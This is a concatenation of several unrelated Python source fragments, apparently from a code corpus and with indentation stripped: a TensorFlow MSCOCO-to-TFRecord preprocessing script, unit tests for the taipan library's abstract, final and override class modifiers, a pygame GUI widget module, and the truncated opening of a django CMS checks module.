if word in self._vocab:
return self._vocab[word]
else:
return self._unk_id
class ImageDecoder(object):
"""Helper class for decoding images in TensorFlow."""
def __init__(self):
# Create a single TensorFlow Session for all image decoding calls.
self._sess = tf.Session()
# TensorFlow ops for JPEG decoding.
self._encoded_jpeg = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)
def decode_jpeg(self, encoded_jpeg):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._encoded_jpeg: encoded_jpeg})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _int64_feature(value):
"""Wrapper for inserting an int64 Feature into a SequenceExample proto."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
"""Wrapper for inserting a bytes Feature into a SequenceExample proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
"""Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
"""Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
"""Builds a SequenceExample proto for an image-caption pair.
Args:
image: An ImageMetadata object.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
Returns:
A SequenceExample proto.
"""
with tf.gfile.FastGFile(image.filename, "r") as f:
encoded_image = f.read()
try:
decoder.decode_jpeg(encoded_image)
except (tf.errors.InvalidArgumentError, AssertionError):
print("Skipping file with invalid JPEG data: %s" % image.filename)
return
context = tf.train.Features(feature={
"image/image_id": _int64_feature(image.image_id),
"image/data": _bytes_feature(encoded_image),
})
assert len(image.captions) == 1
caption = image.captions[0]
caption_ids = [vocab.word_to_id(word) for word in caption]
feature_lists = tf.train.FeatureLists(feature_list={
"image/caption": _bytes_feature_list(caption),
"image/caption_ids": _int64_feature_list(caption_ids)
})
sequence_example = tf.train.SequenceExample(
context=context, feature_lists=feature_lists)
return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
num_shards):
"""Processes and saves a subset of images as TFRecord files in one thread.
Args:
thread_index: Integer thread identifier within [0, len(ranges)].
ranges: A list of pairs of integers specifying the ranges of the dataset to
process in parallel.
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
decoder: An ImageDecoder object.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Each thread produces N shards where N = num_shards / num_threads. For
# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Processing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
| |
"""
Tests for .objective.modifiers module.
"""
import abc
from taipan.objective.base import Object
from taipan.functional.functions import const
from tests.test_objective.test_base import _UniversalBaseClass
import taipan.objective.modifiers as __unit__
# @abstract
class _Abstract(_UniversalBaseClass):
def _assertIsABC(self, class_):
self.assertIsSubclass(type(class_), abc.ABCMeta)
def _assertCantInstantiate(self, class_, *args, **kwargs):
with self.assertRaises(TypeError) as r:
class_(*args, **kwargs)
msg = str(r.exception)
self.assertIn("instantiate", msg)
self.assertIn(class_.__name__, msg)
def _create_abstract_method_class(self, base, method=None):
method = method or (lambda self: None)
@__unit__.abstract
class Foo(base):
@__unit__.abstract.method
def foo(self):
return method(self)
return Foo
class Abstract(_Abstract):
def test_none(self):
with self.assertRaises(TypeError):
__unit__.abstract(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.abstract(object())
def test_function(self):
with self.assertRaises(TypeError):
@__unit__.abstract
def foo():
pass
class Abstract_StandardClasses(_Abstract):
"""Tests for @abstract modifier as applied to standard Python classes."""
def test_class__empty(self):
@__unit__.abstract
class Foo(object):
pass
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_class__with_abstract_method(self):
Foo = self._create_abstract_method_class()
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_class__with_abstract_property(self):
@__unit__.abstract
class Foo(object):
@__unit__.abstract.property
def foo(self):
pass
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_inheritance__without_override(self):
Foo = self._create_abstract_method_class()
class Bar(Foo):
pass
self._assertCantInstantiate(Bar)
def test_inheritance__with_override(self):
Foo = self._create_abstract_method_class()
class Bar(Foo):
def foo(self):
pass
Bar().foo()
def test_inheritance__with_override__and_super_call(self):
retval = 42
Foo = self._create_abstract_method_class(method=const(retval))
class Bar(Foo):
def foo(self):
return super(Bar, self).foo()
self.assertEquals(retval, Bar().foo())
def test_inheritance_chain(self):
Foo = self._create_abstract_method_class()
@__unit__.abstract
class Bar(Foo):
pass
self._assertIsABC(Bar)
self._assertCantInstantiate(Bar)
# Utility functions
def _create_abstract_method_class(self, method=None):
return super(Abstract_StandardClasses, self) \
._create_abstract_method_class(base=object, method=method)
class Abstract_ObjectiveClasses(_Abstract):
"""Tests for @abstract modifier as applied to our 'objective' classes
(descendants of :class:`taipan.objective.base.Object`).
"""
def test_class__empty(self):
@__unit__.abstract
class Foo(Object):
pass
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_class__with_abstract_method(self):
Foo = self._create_abstract_method_class()
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_class__with_abstract_property(self):
@__unit__.abstract
class Foo(Object):
@__unit__.abstract.property
def foo(self):
pass
self._assertIsABC(Foo)
self._assertCantInstantiate(Foo)
def test_inheritance__without_override(self):
Foo = self._create_abstract_method_class()
class Bar(Foo):
pass
self._assertCantInstantiate(Bar)
def test_inheritance__with_override__but_no_modifier(self):
Foo = self._create_abstract_method_class()
with self._assertRaisesMissingOverrideException():
class Bar(Foo):
def foo(self): # no ``@override``
pass
def test_inheritance__with_override(self):
Foo = self._create_abstract_method_class()
class Bar(Foo):
@__unit__.override
def foo(self):
pass
Bar().foo()
def test_inheritance__with_override__and_super_call(self):
retval = 42
Foo = self._create_abstract_method_class(method=const(retval))
class Bar(Foo):
@__unit__.override
def foo(self):
return super(Bar, self).foo()
self.assertEquals(retval, Bar().foo())
def test_inheritance_chain(self):
Foo = self._create_abstract_method_class()
@__unit__.abstract
class Bar(Foo):
pass
self._assertIsABC(Bar)
self._assertCantInstantiate(Bar)
# Utility functions
def _create_abstract_method_class(self, method=None):
return super(Abstract_ObjectiveClasses, self) \
._create_abstract_method_class(base=Object, method=method)
# @final
class Final(_UniversalBaseClass):
def test_none(self):
with self.assertRaises(TypeError):
__unit__.final(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.final(object())
def test_function(self):
with self.assertRaises(TypeError):
@__unit__.final
def foo():
pass
class Final_Classes(_UniversalBaseClass):
def test_class__incompatible(self):
with self.assertRaises(ValueError):
@__unit__.final
class Foo(object):
pass
def test_class__compatible(self):
self._create_final_class()
def test_class__inherit_from_final__single_inheritance(self):
Foo = self._create_final_class()
with self._assertRaisesFinalInheritanceException(base=Foo):
class Bar(Foo):
pass
def test_class_inherit_from_final__multiple_inheritance(self):
FinalBase = self._create_final_class()
class Foo(object):
pass
with self._assertRaisesFinalInheritanceException(base=FinalBase):
class Bar(Foo, FinalBase):
pass
# Utility functions
def _create_final_class(self):
@__unit__.final
class Foo(Object):
pass
return Foo
class Final_Methods(_UniversalBaseClass):
def test_method__normal__attempt_override(self):
Base = self._create_class_with_final_method()
with self._assertRaisesOverrideFinalException():
class Foo(Base):
@__unit__.override
def florb(self):
pass
def test_method__normal__attempt_hiding(self):
Base = self._create_class_with_final_method()
with self._assertRaisesHideFinalException():
class Foo(Base):
def florb(self):
pass
def test_method__override__attempt_further_override(self):
Foo = self._create_class_with_final_override_method()
with self._assertRaisesOverrideFinalException():
class Bar(Foo):
@__unit__.override
def florb(self):
pass
def test_method__override__attempt_hiding(self):
Foo = self._create_class_with_final_override_method()
with self._assertRaisesHideFinalException():
class Bar(Foo):
def florb(self):
pass
def test_method__reversed_final_and_override(self):
"""Test for 'reversed' application of @override and @final
on a single method.
This is 'reversed' in contrast to the recommended and more readable
way of placing @final before @override, as mentioned by docs
of the former. Nevertheless, the reversed way should still work.
"""
class Base(Object):
def florb(self):
pass
class Foo(Base):
@__unit__.override
@__unit__.final
def florb(self):
pass
with self._assertRaisesOverrideFinalException():
class Bar(Foo):
@__unit__.override
def florb(self):
pass
with self._assertRaisesHideFinalException():
class Bar(Foo):
def florb(self):
pass
# Utility functions
def _create_class_with_final_method(self):
class Base(Object):
@__unit__.final
def florb(self):
pass
return Base
def _create_class_with_final_override_method(self):
class Base(Object):
def florb(self):
pass
class Foo(Base):
@__unit__.final
@__unit__.override
def florb(self):
pass
return Foo
# @override
class _Override(_UniversalBaseClass):
def _create_regular_class(self):
return self._create_class(base=object)
def _create_objective_class(self):
return self._create_class(base=Object)
def _create_class(self, base):
class Class(base):
def florb(self):
pass
@classmethod
def class_florb(cls):
pass
@staticmethod
def static_florb():
pass
return Class
class Override_Basics(_Override):
def test_none(self):
with self.assertRaises(TypeError):
__unit__.override(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.override(object())
def test_regular_function(self):
with self.assertRaises(TypeError):
@__unit__.override
def foo():
pass
class Override_InstanceMethods(_Override):
def test_instance_method__unnecessary(self):
with self._assertRaisesUnnecessaryOverrideException():
class Foo(Object):
@__unit__.override
def foo(self):
pass
def test_instance_method__missing(self):
Base = self._create_objective_class()
with self._assertRaisesMissingOverrideException():
class Bar(Base):
def florb(self):
pass
def test_instance_method__missing__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
# even though the improperly overridden method comes from
# non-Object-inheriting base class, the presence of
# other Object-inherting base class should ellicit the error
with self._assertRaisesMissingOverrideException():
class Bar(Base, Object):
def florb(self):
pass
def test_instance_method__present(self):
Base = self._create_objective_class()
class Bar(Base):
@__unit__.override
def florb(self):
pass
def test_instance_method__present__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
class Bar(Base, Object):
@__unit__.override
def florb(self):
pass
class Override_InstanceMethods_WithExplicitBase(_Override):
OBJECT_CLASSNAME = 'taipan.objective.base.Object'
class InnerClass(object):
def florb(self):
pass
def test_override_base__class_object__correct(self):
Base = self._create_objective_class()
class Bar(Base):
@__unit__.override(Base)
def florb(self):
pass
def test_override_base__class_object__incorrect(self):
Base = self._create_objective_class()
with self._assertRaisesIncorrectOverrideBase(Object, correct=Base):
class Bar(Base):
@__unit__.override(Object)
def florb(self):
pass
def test_override_base__class_name(self):
# we can use the universal base Object class itself to avoid
# introducing another class in the global scope
with self._assertRaisesUnnecessaryOverrideException():
class Foo(Object):
@__unit__.override(self.OBJECT_CLASSNAME)
def foo(self):
pass
def test_override_base__class_name__incorrect(self):
Base = self._create_objective_class()
with self._assertRaisesIncorrectOverrideBase(Object, correct=Base):
class Bar(Base):
@__unit__.override(self.OBJECT_CLASSNAME)
def florb(self):
pass
def test_override_base__class_name__inner_class(self):
Base = self.InnerClass
classname = '.'.join([
__name__, self.__class__.__name__, Base.__name__])
class Bar(Base):
@__unit__.override(classname)
def florb(self):
pass
class Override_ClassMethods(_Override):
def test_class_method__unnecessary(self):
with self._assertRaisesUnnecessaryOverrideException():
class Foo(Object):
@__unit__.override
@classmethod
def class_florb(cls):
pass
def test_class_method__missing(self):
Base = self._create_objective_class()
with self._assertRaisesMissingOverrideException():
class Foo(Base):
@classmethod
def class_florb(cls):
pass
def test_class_method__missing__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
# see comment in analogous test case for instance methods
with self._assertRaisesMissingOverrideException():
class Foo(Base, Object):
@classmethod
def class_florb(cls):
pass
def test_class_method__present(self):
Base = self._create_objective_class()
class Foo(Base):
@__unit__.override
@classmethod
def class_florb(cls):
pass
def test_class_method__present__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
class Foo(Base, Object):
@__unit__.override
@classmethod
def class_florb(cls):
pass
def test_class_method__present__but_below_classmethod_decorator(self):
Base = self._create_objective_class()
with self.assertRaises(TypeError) as r:
class Foo(Base):
@classmethod
@__unit__.override
def class_florb(cls):
pass
self.assertIn("@classmethod", str(r.exception))
class Override_StaticMethods(_Override):
def test_static_method__unnecessary(self):
with self._assertRaisesUnnecessaryOverrideException():
class Baz(Object):
@__unit__.override
@staticmethod
def static_florb():
pass
def test_static_method__missing(self):
Base = self._create_objective_class()
with self._assertRaisesMissingOverrideException():
class Baz(Base):
@staticmethod
def static_florb():
pass
def test_static_method__missing__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
with self._assertRaisesMissingOverrideException():
class Baz(Base, Object):
@staticmethod
def static_florb():
pass
def test_static_method__present(self):
Base = self._create_objective_class()
class Baz(Base):
@__unit__.override
@staticmethod
def static_florb():
pass
def test_static_method__present__hiding_method_from_regular_base(self):
Base = self._create_regular_class()
class Baz(Base, Object):
@__unit__.override
@staticmethod
def static_florb():
pass
| |
import pygame
from pygame.locals import *
from util import debug, file_list, gamedir
from imagecache import ImageCache
from util import file_path
def render_text (text, size=32, color=(0,0,0), font=None):
#font = pygame.font.SysFont('monospace', size)
if font is None:
font = pygame.font.Font(file_path('fonts','BLKCHCRY.TTF'), size)
return font.render(str(text), 1, color)
def scrn_print(surface, text, x, y, size=32, color=(0,0,0)):
rendered_text = render_text(text, size=size, color=color)
textpos = rendered_text.get_rect()
textpos.centerx = x
textpos.centery = y
surface.blit(rendered_text, textpos)
class Label(pygame.sprite.DirtySprite):
def __init__(self, text,pos, layer=6, color=(255,0,0)):
self._layer = layer
super(pygame.sprite.DirtySprite, self).__init__()
self.image = render_text (text, size=16, color=color, font=None)
self.rect = self.image.get_rect()
self.rect.x = pos[0]
self.rect.y = pos[1]
self.name = ''
self.value = text
def delete(self):
self.kill()
class MouseOver(Label):
def __init__(self, text, pos, layer=6):
self.__layer = layer
text = ' '+text
Label.__init__(self, text, pos, layer)
img = pygame.Surface((self.rect.w, self.rect.h))
img.fill((209,212,144))
img.blit(self.image,(0,0))
self.image = img
class Button(pygame.sprite.DirtySprite):
def __init__(self, label, onclick, onclick_params, eventstack,imagecache, pos=(0,0), layer=2, name='', sendself=False, fontsize=16):
self._layer = layer
self.registered_events = []
self.name = name
super(pygame.sprite.DirtySprite, self).__init__()
button_rest = imagecache['button_rest']
button_hi = imagecache['button_hi']
button_click = imagecache['button_click']
self.pos = pos
self.onclick = onclick
self.onclick_params = onclick_params
self.sendself = sendself
#self.label = render_text (label, size=fontsize, color=(20,250,20))
self.label = render_text (label, size=fontsize, color=(255,255,255))
labelrect = self.label.get_rect()
self.button_rest = pygame.transform.smoothscale(button_rest, (labelrect.w + 50, labelrect.h + 12))
self.button_rest.blit(self.label,(25,6))
self.button_hi = pygame.transform.smoothscale(button_hi, (labelrect.w + 50, labelrect.h + 12))
self.button_hi.blit(self.label,(25,6))
self.button_click = pygame.transform.smoothscale(button_click, (labelrect.w + 50, labelrect.h + 12))
self.button_click.blit(self.label,(25,6))
rect = self.button_rest.get_rect()
self.eventstack = eventstack
self.rect = pygame.Rect(pos[0], pos[1], rect.w, rect.h)
self.registered_events.append(self.eventstack.register_event("mouseover", self, self.mouseover))
self.registered_events.append(self.eventstack.register_event("button1", self, self.click))
self.mouseout(None)
def mouseover(self, pos):
self.image = self.button_hi
self.eventstack.register_event("mouseout", self, self.mouseout)
def mouseout(self, pos):
self.image = self.button_rest
self.image.convert()
def click(self, pos):
self.image = self.button_click
if self.onclick is not None:
if not self.sendself:
self.onclick(*self.onclick_params)
else:
self.onclick(self, *self.onclick_params)
def delete(self):
for h in self.registered_events:
self.eventstack.unregister_event(h)
self.kill()
class BlitButton(Button):
def __init__(self, onclick, onclick_params, eventstack,imagecache, imagekey, pos=(0,0), layer=10, scale=0):
self._layer = layer
Button.__init__(self, '', onclick, onclick_params, eventstack, imagecache, pos, layer)
self.button_rest = imagecache[imagekey].copy()
if scale:
self.button_rest = pygame.transform.smoothscale(self.button_rest, (scale, scale))
self.button_hi = self.button_rest
self.button_click = self.button_rest
self.image = self.button_rest
self.rect = self.button_rest.get_rect()
self.rect.x, self.rect.y = pos
class ButtonArrow(BlitButton):
def __init__(self, onclick, onclick_params, eventstack,imagecache, direction, pos=(0,0), layer=10):
self._layer = layer
BlitButton.__init__(self, onclick, onclick_params, eventstack, imagecache,'arrow_%s' %direction, pos, layer)
class checkboxbtn(Button):
checked = False
def __init__(self, label, onclick, onclick_params, eventstack,imagecache, pos=(0,0),fontsize=16, layer=6, name='', sendself=False):
self._layer = layer
self.registered_events = []
self.name = name
super(pygame.sprite.DirtySprite, self).__init__()
self.pos = pos
self.sendself = sendself
self.onclick = onclick
self.onclick_params = onclick_params
self.label = render_text (label, size=fontsize, color=(255,0,20))
labelrect = self.label.get_rect()
self.checkedimg = pygame.Surface((labelrect.w + 30, 31),pygame.SRCALPHA, 32)
self.uncheckedimg = pygame.Surface((labelrect.w + 30, 31),pygame.SRCALPHA, 32)
self.checkedimg.convert_alpha()
self.uncheckedimg.convert_alpha()
self.checkedimg.blit(imagecache['checkbtn_checked'], (0,0))
self.uncheckedimg.blit(imagecache['checkbtn_unchecked'], (0,0))
self.checkedimg.blit(self.label,(30,3))
self.uncheckedimg.blit(self.label,(30,3))
rect = self.uncheckedimg.get_rect()
self.rect = pygame.Rect(pos[0],pos[1],rect.w, rect.h)
self.eventstack = eventstack
self.registered_events.append(self.eventstack.register_event("button1", self, self.click))
@property
def value(self):
return self.checked
@property
def image(self):
if self.checked:
return self.checkedimg
else:
return self.uncheckedimg
def click(self, pos):
self.checked = not self.checked
if self.onclick is not None:
if not self.sendself:
self.onclick(*self.onclick_params)
else:
self.onclick(self, self.checked, *self.onclick_params)
class TextInput(pygame.sprite.DirtySprite):
def __init__(self, rect, fontsize, eventstack, prompt='', clearprompt=True, layer=1, name='', onreturn=None, onreturn_args=[]):
self.prompt = prompt
self.clearprompt = clearprompt
self.text = prompt
self._layer = layer
self.registered_events = []
self.name = name
self.onreturn = onreturn
self.onreturn_args = onreturn_args
super(pygame.sprite.DirtySprite, self).__init__()
self.rect = rect
self.fontsize = fontsize
self.eventstack = eventstack
self.registered_events.append(self.eventstack.register_event("keydown", self, self.kb))
self.registered_events.append(self.eventstack.register_event("button1", self, self.click))
self.cur = False
self.cpos = len(self.text)
self.counter = 0
self.capslock = False
self.has_focus = False
def get_text(self):
if self.text == self.prompt:
return ''
else:
return self.text
@property
def value(self):
return self.text
@property
def image(self):
self.counter += 1
if (self.counter == 1 or self.counter%10 == 0) and self.has_focus:
self.cur = not self.cur
cur = self.cur and '-' or '_'
out = list(self.text)
if self.cpos >= len(out):
out.append(cur)
else:
out.insert(self.cpos,cur)
surface = pygame.Surface((self.rect.w, self.rect.h))
surface.fill((255,255,255))
surface.blit(render_text (''.join(out), color=(0,0,0), font=pygame.font.SysFont('monospace',self.fontsize)), (3,3))
return surface
def kb(self, event):
#This method almost certainly could be made a lot better
if not self.has_focus:
return
if event.key == K_BACKSPACE:
if len(self.text) > 0:
try:
out = list(self.text)
del out[self.cpos -1]
self.text = ''.join(out)
except:
self.cpos = len(self.text)
elif event.key == K_DELETE:
if len(self.text) > 0 and self.cpos < len(self.text):
try:
out = list(self.text)
del out[self.cpos]
self.text = ''.join(out)
except:
self.cpos = len(self.text)
elif event.key == K_CAPSLOCK:
self.capslock = not self.capslock
elif event.key == K_RETURN:
self.has_focus = False
if self.onreturn:
self.onreturn(*self.onreturn_args)
elif event.key == K_SPACE:
self.text += ' '
elif event.key == K_LEFT:
if self.cpos > 0: self.cpos -= 1
elif event.key == K_RIGHT:
if self.cpos < len(self.text): self.cpos += 1
else:
if not self.capslock:
new = event.unicode
else:
new = event.unicode.upper()
out = list(self.text)
try:
out.insert(self.cpos, new)
except:
out.append(new)
self.text = ''.join(out)
self.cpos += 1
return True
def delete(self):
for h in self.registered_events:
self.eventstack.unregister_event(h)
self.kill()
def click(self, pos):
self.has_focus = True
if self.clearprompt and self.text == self.prompt:
self.text = ''
class Dropdown(pygame.sprite.DirtySprite):
def __init__(self, eventstack, imagecache, fontsize, rect, choices,layer=7, choice='',onselect=None,name='', sendself=False):
self._layer = layer
super(pygame.sprite.DirtySprite, self).__init__()
self.name = name
self.sendself = sendself
self.onselect = onselect
self.choicerects = {}
self.eventstack = eventstack
self.fontsize = fontsize
self.imagecache = imagecache
self.uprect = pygame.Rect(rect.x, rect.y, rect.w, rect.h)
self.downrect = pygame.Rect(rect.x, rect.y, rect.w, rect.h * (len(choices) + 1))
self.rect = self.uprect
self.choices = choices
self.choice = choice
self.font=pygame.font.SysFont('monospace',self.fontsize)
self.upsurface = pygame.Surface((self.uprect.w, self.uprect.h))
self.dnsurface = pygame.Surface((self.downrect.w, self.downrect.h))
self.upsurface.fill((255,255,255))
self.arrow_down = pygame.transform.smoothscale(imagecache['arrow_down'],(32,self.rect.h))
self.upsurface.blit(self.arrow_down,(rect.w - 30, 0))
counter = 1
self.image = self.upsurface
self.registered_events = []
self.registered_events.append(self.eventstack.register_event("button1", self, self.click))
self.registered_events.append(self.eventstack.register_event("mouseover", self, self.mouseover))
self.mouseover('force')
self.down = False
self.upsurface.blit(render_text (self.choice, font=self.font, color=(0,0,0)),(0,0))
@property
def value(self):
return self.choice
def itemsurface(self, choice, highlight=False):
surface = pygame.Surface((self.uprect.w, self.uprect.h))
if highlight:
surface.fill((170,178,255))
else:
surface.fill((170,178,181))
surface.blit(render_text (choice, font=self.font, color=(0,0,0)),(0,0))
return surface
def delete(self):
for h in self.registered_events:
self.eventstack.unregister_event(h)
self.kill()
def mouseover(self, pos):
x,y = 0,0
if not isinstance(pos, str):
x, y = pos
counter = 1
if isinstance(pos, str) or (self.down and y > self.uprect.y + self.uprect.h):
for c in self.choices:
choicerect = pygame.Rect(self.uprect.x,self.uprect.y + self.uprect.h*counter, self.downrect.w, self.uprect.h)
if choicerect.collidepoint(x,y):
choicesurface = self.itemsurface(c, True)
else:
choicesurface = self.itemsurface(c)
self.dnsurface.blit(choicesurface,(0,self.uprect.h*counter))
self.choicerects[c] = choicerect
counter += 1
def click(self, pos):
x, y = pos
if self.down and y > self.uprect.y + self.uprect.h:
for k,v in self.choicerects.items():
if v.collidepoint(x,y):
self.choice = k
self.upsurface.fill((255,255,255))
self.upsurface.blit(render_text (k, font=self.font, color=(0,0,0)),(0,0))
self.upsurface.blit(self.arrow_down,(self.uprect.w - 30, 0))
if self.onselect is not None:
if not self.sendself:
self.onselect(self.choice)
else:
self.onselect(self, self.choice)
break
self.down = not self.down
def update(self):
self.dnsurface.blit(self.upsurface,(0,0))
if self.down:
self.image = self.dnsurface
self.rect = self.downrect
else:
self.image = self.upsurface
self.rect = self.uprect
| |
# -*- coding: utf-8 -*-
from __future__ import with_statement
from contextlib import contextmanager
import inspect
import os
from itertools import chain
from django.conf import settings
from django.template import Lexer, TOKEN_BLOCK
from django.utils.decorators import method_decorator
from django.utils.termcolors import colorize
from sekizai.helpers import validate_template
from cms import constants
from cms.utils import get_cms_setting
from cms.utils.compat.dj import get_app_paths
SUCCESS = 1
WARNING = 2
ERROR = 3
SKIPPED = 4
CHECKERS = []
class FileOutputWrapper(object):
"""
